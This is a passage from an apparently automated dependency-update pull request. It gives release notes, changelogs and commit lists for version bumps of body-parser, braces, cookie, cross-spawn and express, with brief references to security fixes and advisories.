href=\"https://redirect.github.com/expressjs/body-parser/pull/527\"\u003eexpressjs/body-parser#527\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.12.3 by \u003ca href=\"https://github.com/melikhov-dev\"\u003e\u003ccode\u003e@​melikhov-dev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/521\"\u003eexpressjs/body-parser#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OSSF Scorecard badge by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/531\"\u003eexpressjs/body-parser#531\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLinter by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/534\"\u003eexpressjs/body-parser#534\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.3 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/535\"\u003eexpressjs/body-parser#535\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/blob/1.20.5/HISTORY.md\"\u003ebody-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.20.5 / 2026-04-24\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003erefactor(json): simplify strict mode error string construction\u003c/li\u003e\n\u003cli\u003efix: extended urlencoded parsing of arrays with \u0026gt;100 elements (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/716\"\u003e#716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: qs@~6.15.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.4 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@~6.14.0\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: http-errors@~2.0.1\u003c/li\u003e\n\u003cli\u003edeps: raw-body@~2.5.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.3 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.2 / 2023-02-21\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix strict json error message on Node.js 19+\u003c/li\u003e\n\u003cli\u003edeps: content-type@~1.0.5\n\u003cul\u003e\n\u003cli\u003eperf: skip value escaping when unnecessary\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: raw-body@2.5.2\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/0defdbe7f95ad0d3bc007d3a7c59c8c0ab9e6575\"\u003e\u003ccode\u003e0defdbe\u003c/code\u003e\u003c/a\u003e release(patch): 1.20.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/cd0e7a000c53e7be7262d303e57a352b6a00db7f\"\u003e\u003ccode\u003ecd0e7a0\u003c/code\u003e\u003c/a\u003e deps(qs): bump qs to 6.15.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/6f24d7e8bcd9860b136920926ce86da1a7dd1d51\"\u003e\u003ccode\u003e6f24d7e\u003c/code\u003e\u003c/a\u003e fix: correct off-by-one error in parameterCount (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/716\"\u003e#716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/b849bd533d8b4abf5576a3e301f28d9befa05ddd\"\u003e\u003ccode\u003eb849bd5\u003c/code\u003e\u003c/a\u003e deps: qs@~6.14.1 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/690\"\u003e#690\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/2c55e2f712f320a8e8d0f9fcb1d06526d0e401c9\"\u003e\u003ccode\u003e2c55e2f\u003c/code\u003e\u003c/a\u003e refactor(json): simplify strict mode error string construction (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/692\"\u003e#692\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/7db202cac84a001e6566c2dc6516b44db98beff3\"\u003e\u003ccode\u003e7db202c\u003c/code\u003e\u003c/a\u003e 1.20.4 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/672\"\u003e#672\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/d8f8adb898676dfdf997b4455e5f9b689b53e989\"\u003e\u003ccode\u003ed8f8adb\u003c/code\u003e\u003c/a\u003e ci: add CodeQL (SAST) (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/670\"\u003e#670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/6d133c19b3e7c0bb8301959ca1dba283d23d23c3\"\u003e\u003ccode\u003e6d133c1\u003c/code\u003e\u003c/a\u003e chore: remove SECURITY.md (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/669\"\u003e#669\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/fcd15355041ada6f37288dd13858d50429016b66\"\u003e\u003ccode\u003efcd1535\u003c/code\u003e\u003c/a\u003e deps: use tilde notation and update certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/668\"\u003e#668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/ec5fa290d25d85e0049757e240249072331eaee6\"\u003e\u003ccode\u003eec5fa29\u003c/code\u003e\u003c/a\u003e deps: qs@~6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/664\"\u003e#664\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.1...1.20.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for body-parser since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `braces` from 3.0.2 to 3.0.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/74b2db2938fad48a2ea54a9c8bf27a37a62c350d\"\u003e\u003ccode\u003e74b2db2\u003c/code\u003e\u003c/a\u003e 3.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/88f1429a0f47e1dd3813de35211fc97ffda27f9e\"\u003e\u003ccode\u003e88f1429\u003c/code\u003e\u003c/a\u003e update eslint. lint, fix unit tests.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff\"\u003e\u003ccode\u003e415d660\u003c/code\u003e\u003c/a\u003e Snyk js braces 6838727 (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/40\"\u003e#40\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/190510f79db1adf21d92798b0bb6fccc1f72c9d6\"\u003e\u003ccode\u003e190510f\u003c/code\u003e\u003c/a\u003e fix tests, skip 1 test in test/braces.expand\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/716eb9f12d820b145a831ad678618731927e8856\"\u003e\u003ccode\u003e716eb9f\u003c/code\u003e\u003c/a\u003e readme bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/a5851e57f45c3431a94d83fc565754bc10f5bbc3\"\u003e\u003ccode\u003ea5851e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/braces/issues/37\"\u003e#37\u003c/a\u003e from coderaiser/fix/vulnerability\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/2092bd1fb108d2c59bd62e243b70ad98db961538\"\u003e\u003ccode\u003e2092bd1\u003c/code\u003e\u003c/a\u003e feature: braces: add maxSymbols (\u003ca href=\"https://github.com/micromatch/braces/issues/\"\u003ehttps://github.com/micromatch/braces/issues/\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/9f5b4cf47329351bcb64287223ffb6ecc9a5e6d3\"\u003e\u003ccode\u003e9f5b4cf\u003c/code\u003e\u003c/a\u003e fix: vulnerability (\u003ca href=\"https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\"\u003ehttps://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/98414f9f1fabe021736e26836d8306d5de747e0d\"\u003e\u003ccode\u003e98414f9\u003c/code\u003e\u003c/a\u003e remove funding file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/665ab5d561c017a38ba7aafd92cc6655b91d8c14\"\u003e\u003ccode\u003e665ab5d\u003c/code\u003e\u003c/a\u003e update keepEscaping doc (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/27\"\u003e#27\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/braces/compare/3.0.2...3.0.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cookie` from 0.5.0 to 0.7.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jshttp/cookie/releases\"\u003ecookie's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.2\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix object assignment of \u003ccode\u003ehasOwnProperty\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/177\"\u003e#177\u003c/a\u003e)  bc38ffd\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/jshttp/cookie/compare/v0.7.1...v0.7.2\"\u003ehttps://github.com/jshttp/cookie/compare/v0.7.1...v0.7.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.7.1\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAllow leading dot for domain (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/174\"\u003e#174\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eAlthough not permitted in the spec, some users expect this to work and user agents ignore the leading dot according to spec\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd fast path for \u003ccode\u003eserialize\u003c/code\u003e without options, use \u003ccode\u003eobj.hasOwnProperty\u003c/code\u003e when parsing (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/172\"\u003e#172\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/jshttp/cookie/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/jshttp/cookie/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.7.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eperf: parse cookies ~10% faster (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/144\"\u003e#144\u003c/a\u003e by \u003ca href=\"https://github.com/kurtextrem\"\u003e\u003ccode\u003e@​kurtextrem\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/170\"\u003e#170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: narrow the validation of cookies to match RFC6265 (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/167\"\u003e#167\u003c/a\u003e by \u003ca href=\"https://github.com/bewinsnw\"\u003e\u003ccode\u003e@​bewinsnw\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: add \u003ccode\u003emain\u003c/code\u003e to \u003ccode\u003epackage.json\u003c/code\u003e for rspack (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/166\"\u003e#166\u003c/a\u003e by \u003ca href=\"https://github.com/proudparrot2\"\u003e\u003ccode\u003e@​proudparrot2\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/jshttp/cookie/compare/v0.6.0...v0.7.0\"\u003ehttps://github.com/jshttp/cookie/compare/v0.6.0...v0.7.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.6.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003epartitioned\u003c/code\u003e option\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/d19eaa1a2bb9ca43ac0951edd852ba4e88e410e0\"\u003e\u003ccode\u003ed19eaa1\u003c/code\u003e\u003c/a\u003e 0.7.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/bc38ffd0eae716b199236dda061d0bdc74192dd3\"\u003e\u003ccode\u003ebc38ffd\u003c/code\u003e\u003c/a\u003e Fix object assignment of \u003ccode\u003ehasOwnProperty\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/177\"\u003e#177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/cf4658f492c5bd96aeaf5693c3500f8495031014\"\u003e\u003ccode\u003ecf4658f\u003c/code\u003e\u003c/a\u003e 0.7.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/6a8b8f5a49af7897b98ebfb29a1c4955afa3d33e\"\u003e\u003ccode\u003e6a8b8f5\u003c/code\u003e\u003c/a\u003e Allow leading dot for domain (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/174\"\u003e#174\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/58015c0b93de0b63db245cfdc5a108e511a81ad0\"\u003e\u003ccode\u003e58015c0\u003c/code\u003e\u003c/a\u003e Remove more code and perf wins (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/172\"\u003e#172\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/ab057d6c06b94a7b1e3358e69a685ae49c97b627\"\u003e\u003ccode\u003eab057d6\u003c/code\u003e\u003c/a\u003e 0.7.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/5f02ca87688481dbcf155e49ca8b61732f30e542\"\u003e\u003ccode\u003e5f02ca8\u003c/code\u003e\u003c/a\u003e Migrate history to GitHub releases\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/a5d591ce8447dd63821779724f96ad3c774c8579\"\u003e\u003ccode\u003ea5d591c\u003c/code\u003e\u003c/a\u003e Migrate history to GitHub releases\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/51968f94b5e820adeceef505539fa193ffe2d105\"\u003e\u003ccode\u003e51968f9\u003c/code\u003e\u003c/a\u003e Skip isNaN\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/9e7ca51ade4b325307eedd6b4dec190983e9e2cc\"\u003e\u003ccode\u003e9e7ca51\u003c/code\u003e\u003c/a\u003e perf(parse): cache length, return early (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/144\"\u003e#144\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jshttp/cookie/compare/v0.5.0...v0.7.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~blakeembrey\"\u003eblakeembrey\u003c/a\u003e, a new releaser for cookie since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cross-spawn` from 7.0.3 to 7.0.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/blob/master/CHANGELOG.md\"\u003ecross-spawn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.5...v7.0.6\"\u003e7.0.6\u003c/a\u003e (2024-11-18)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate cross-spawn version to 7.0.5 in package-lock.json (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003ef700743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.4...v7.0.5\"\u003e7.0.5\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix escaping bug introduced by backtracking (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e640d391\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.4\"\u003e7.0.4\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edisable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e5ff3a07\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/77cd97f3ca7b62c904a63a698fc4a79bf41977d0\"\u003e\u003ccode\u003e77cd97f\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/6717de49ff1e5de49622488dcb9c33fb25370c85\"\u003e\u003ccode\u003e6717de4\u003c/code\u003e\u003c/a\u003e chore: upgrade standard-version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003e\u003ccode\u003ef700743\u003c/code\u003e\u003c/a\u003e fix: update cross-spawn version to 7.0.5 in package-lock.json\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9a7e3b2165917367f74b8365faad9873b30d7263\"\u003e\u003ccode\u003e9a7e3b2\u003c/code\u003e\u003c/a\u003e chore: fix build status badge\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/085268352dcbcad8064c64c5efb25268b4023184\"\u003e\u003ccode\u003e0852683\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e\u003ccode\u003e640d391\u003c/code\u003e\u003c/a\u003e fix: fix escaping bug introduced by backtracking\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/bff0c87c8b627c4e6d04ec2449e733048bebb464\"\u003e\u003ccode\u003ebff0c87\u003c/code\u003e\u003c/a\u003e chore: remove codecov\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/a7c6abc6fee79641d45b452fe6217deaa1bd0973\"\u003e\u003ccode\u003ea7c6abc\u003c/code\u003e\u003c/a\u003e chore: replace travis with github workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9b9246e0969e86656d7ccd527716bc3c18842a19\"\u003e\u003ccode\u003e9b9246e\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e\u003ccode\u003e5ff3a07\u003c/code\u003e\u003c/a\u003e fix: disable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.18.2 to 4.22.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/releases\"\u003eexpress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.22.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: restore \u0026gt;20 array parsing for \u003ccode\u003ereq.query\u003c/code\u003e repeated keys (\u003ca href=\"https://github.com/expressjs/express/commit/8d09bfe6d88983da5c3e12cfdd54782c4dc675db\"\u003e\u003ccode\u003e8d09bfe6\u003c/code\u003e\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eThis also unifies array-cap behavior across notations. Indexed notation (\u003ccode\u003ea[0]=...\u003c/code\u003e) was historically capped at qs's default \u003ccode\u003earrayLimit\u003c/code\u003e of 20 even in older qs versions; after this change it also allows up to 1000 items.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: qs@~6.15.1\u003c/li\u003e\n\u003cli\u003edeps: body-parser@~1.20.5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/suuuuuuminnnnnn\"\u003e\u003ccode\u003e@​suuuuuuminnnnnn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/7021\"\u003eexpressjs/express#7021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/SAY-5\"\u003e\u003ccode\u003e@​SAY-5\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/7181\"\u003eexpressjs/express#7181\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/v4.22.1...v4.22.2\"\u003ehttps://github.com/expressjs/express/compare/v4.22.1...v4.22.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.22.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!IMPORTANT]\u003cbr /\u003e\nThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cul\u003e\n\u003cli\u003eRelease: 4.22.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6934\"\u003eexpressjs/express#6934\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.22.0...v4.22.1\"\u003ehttps://github.com/expressjs/express/compare/4.22.0...v4.22.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.22.0\u003c/h2\u003e\n\u003ch2\u003eImportant: Security\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRefactor: improve readability by \u003ca href=\"https://github.com/sazk07\"\u003e\u003ccode\u003e@​sazk07\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6190\"\u003eexpressjs/express#6190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js@23.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6080\"\u003eexpressjs/express#6080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMethod functions with no path should error by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5957\"\u003eexpressjs/express#5957\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: updated github actions ci workflow by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6323\"\u003eexpressjs/express#6323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6336\"\u003eexpressjs/express#6336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackport: ci: add node.js 24 to test matrix by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca 